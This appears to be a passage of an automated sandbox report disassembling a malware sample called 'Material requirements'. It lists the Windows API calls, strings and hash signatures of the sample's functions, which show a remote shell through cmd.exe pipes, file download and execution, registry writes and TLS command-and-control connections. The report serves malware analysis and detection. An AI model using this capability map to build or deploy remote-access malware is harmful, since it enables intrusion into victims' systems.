                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                        • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                        • API String ID: 994465650-2151626615
                        • Opcode ID: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
                        • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                        • Opcode Fuzzy Hash: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
                        • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF

                        Control-flow Graph

                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                        • closesocket.WS2_32(000000FF), ref: 0040481F
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                        • String ID:
                        • API String ID: 3658366068-0
                        • Opcode ID: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
                        • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                        • Opcode Fuzzy Hash: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
                        • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48

                        Control-flow Graph
                        • Rendered graph of the function starting at 0x40c89e (node and edge listing omitted); Windows API calls reached in the graph: GetLongPathNameW
                        APIs
                        • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: LongNamePath
                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                        • API String ID: 82841172-425784914
                        • Opcode ID: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
                        • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                        • Opcode Fuzzy Hash: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
                        • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F

                        Control-flow Graph

                        APIs
                          • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                          • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                          • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                          • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                        • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCurrentOpenProcessQueryValue
                        • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                        • API String ID: 1866151309-3211212173
                        • Opcode ID: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
                        • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                        • Opcode Fuzzy Hash: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
                        • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE

                        Control-flow Graph
                        • Rendered graph of the function starting at 0x4126d2 (node and edge listing omitted); Windows API calls reached in the graph: RegCreateKeyA, RegSetValueExA, RegCloseKey
                        APIs
                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                        • RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                        • RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateValue
                        • String ID: HgF$pth_unenc
                        • API String ID: 1818849710-3662775637
                        • Opcode ID: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
                        • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                        • Opcode Fuzzy Hash: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
                        • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

                        Control-flow Graph
                        • Rendered graph of the function starting at 0x4127d5 (node and edge listing omitted); Windows API calls reached in the graph: RegCreateKeyA, RegSetValueExA, RegCloseKey
                        APIs
                        • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                        • RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                        • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateValue
                        • String ID: TUF
                        • API String ID: 1818849710-3431404234
                        • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                        • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                        • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                        • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4

                        Control-flow Graph
                        • Rendered graph of the function starting at 0x40bed7 (node and edge listing omitted); Windows API calls reached in the graph: CreateMutexA, GetLastError
                        APIs
                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                        • GetLastError.KERNEL32 ref: 0040BEF1
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateErrorLastMutex
                        • String ID: (CG
                        • API String ID: 1925916568-4210230975
                        • Opcode ID: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
                        • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                        • Opcode Fuzzy Hash: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
                        • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                        Control-flow Graph
                        • Rendered graph of the function starting at 0x412513 (node and edge listing omitted); Windows API calls reached in the graph: RegOpenKeyExA, RegQueryValueExA, RegCloseKey
                        APIs
                        • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                        • RegCloseKey.KERNELBASE(?), ref: 0041255F
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID:
                        • API String ID: 3677997916-0
                        • Opcode ID: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                        • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                        • Opcode Fuzzy Hash: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                        • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

                        Control-flow Graph
                        • Rendered graph of the function starting at 0x4124b7 (node and edge listing omitted); Windows API calls reached in the graph: RegOpenKeyExA, RegQueryValueExA, RegCloseKey
                        APIs
                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                        • RegCloseKey.KERNELBASE(?), ref: 00412500
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID:
                        • API String ID: 3677997916-0
                        • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                        • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                        • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                        • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98

                        Control-flow Graph
                        • Rendered graph of the function starting at 0x41246e (node and edge listing omitted); Windows API calls reached in the graph: RegOpenKeyExA, RegQueryValueExA, RegCloseKey
                        APIs
                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                        • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID:
                        • API String ID: 3677997916-0
                        • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                        • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                        • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                        • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _wcslen
                        • String ID: xAG
                        • API String ID: 176396367-2759412365
                        • Opcode ID: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                        • Instruction ID: 06a27fc39790a6443aa461e0e984232ee7603be4cd8470566e0b89af9a4a2a71
                        • Opcode Fuzzy Hash: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                        • Instruction Fuzzy Hash: FE1163329002059FCB15FF66D8969EF77A4EF64314B10453FF842622E2EF38A955CB98
                        APIs
                        • _free.LIBCMT ref: 0044B9EF
                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                        • RtlReAllocateHeap.NTDLL(00000000,00475D50,?,00000004,00000000,?,0044E91A,00475D50,00000004,?,00475D50,?,?,00443135,00475D50,?), ref: 0044BA2B
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap$_free
                        • String ID:
                        • API String ID: 1482568997-0
                        • Opcode ID: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                        • Instruction ID: 4ec374b27fdcb4e51bf886fe72aa52163d481902fd3bbe85b5f84076fdb7f7cd
                        • Opcode Fuzzy Hash: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                        • Instruction Fuzzy Hash: 0FF0C23260051166FB216E679C05F6B2B68DF827B0F15412BFD04B6291DF6CC80191ED
                        APIs
                        • socket.WS2_32(?,00000001,00000006), ref: 00404212
                          • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateEventStartupsocket
                        • String ID:
                        • API String ID: 1953588214-0
                        • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                        • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                        • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                        • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                        APIs
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DF7
                          • Part of subcall function 00437BE7: RaiseException.KERNEL32(?,?,00434421,?,?,?,?,?,?,?,?,00434421,?,0046D644,00404AD0), ref: 00437C47
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E14
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Exception@8Throw$ExceptionRaise
                        • String ID:
                        • API String ID: 3476068407-0
                        • Opcode ID: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                        • Instruction ID: a120e58b429b9861eb3006866c51ef53ea309f8249189fce9472b36b7df41f91
                        • Opcode Fuzzy Hash: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                        • Instruction Fuzzy Hash: EFF0243080430D7BCB14BEAAE80799D772C5D08319F60612BB825955E1EF7CE715C58E
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                        • Instruction ID: 9aef8a7b80d5ef8cde78cc1a95e43686bba12cbd10c6cd592e8946dff14ce016
                        • Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                        • Instruction Fuzzy Hash: 54E0E5312012B5A7FB202A6A9C05F5B7688DB437A4F060033AC45D66D0CB58EC4181AF
                        APIs
                        • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Startup
                        • String ID:
                        • API String ID: 724789610-0
                        • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                        • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                        • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                        • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: send
                        • String ID:
                        • API String ID: 2809346765-0
                        • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                        • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                        • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                        • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                        APIs
                        • SetEvent.KERNEL32(?,?), ref: 00406F28
                        • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                        • DeleteFileW.KERNEL32(00000000), ref: 00407018
                          • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                          • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                          • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                          • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                          • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                          • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                          • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                          • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                          • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                          • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                          • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                        • DeleteFileA.KERNEL32(?), ref: 004078CC
                          • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                          • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                          • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                        • Sleep.KERNEL32(000007D0), ref: 00407976
                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                          • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                        • API String ID: 2918587301-599666313
                        • Opcode ID: 6b0812c8d1b6409269fcb58b153d354c58b0a859e07f54bdc5fc8ea92fbea60e
                        • Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
                        • Opcode Fuzzy Hash: 6b0812c8d1b6409269fcb58b153d354c58b0a859e07f54bdc5fc8ea92fbea60e
                        • Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0040508E
                          • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                          • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        • __Init_thread_footer.LIBCMT ref: 004050CB
                        • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                        • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                          • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                          • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                          • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                        • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                        • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                        • CloseHandle.KERNEL32 ref: 004053CD
                        • CloseHandle.KERNEL32 ref: 004053D5
                        • CloseHandle.KERNEL32 ref: 004053E7
                        • CloseHandle.KERNEL32 ref: 004053EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                        • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                        • API String ID: 3815868655-1274243119
                        • Opcode ID: 8cbc04d304936592b8c30d8c5467e03ddebc48fda1e63d99d06426c92a2a1825
                        • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                        • Opcode Fuzzy Hash: 8cbc04d304936592b8c30d8c5467e03ddebc48fda1e63d99d06426c92a2a1825
                        • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 00410F45
                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                          • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                        • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                          • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                          • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                          • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                        • CloseHandle.KERNEL32(00000000), ref: 00410F90
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
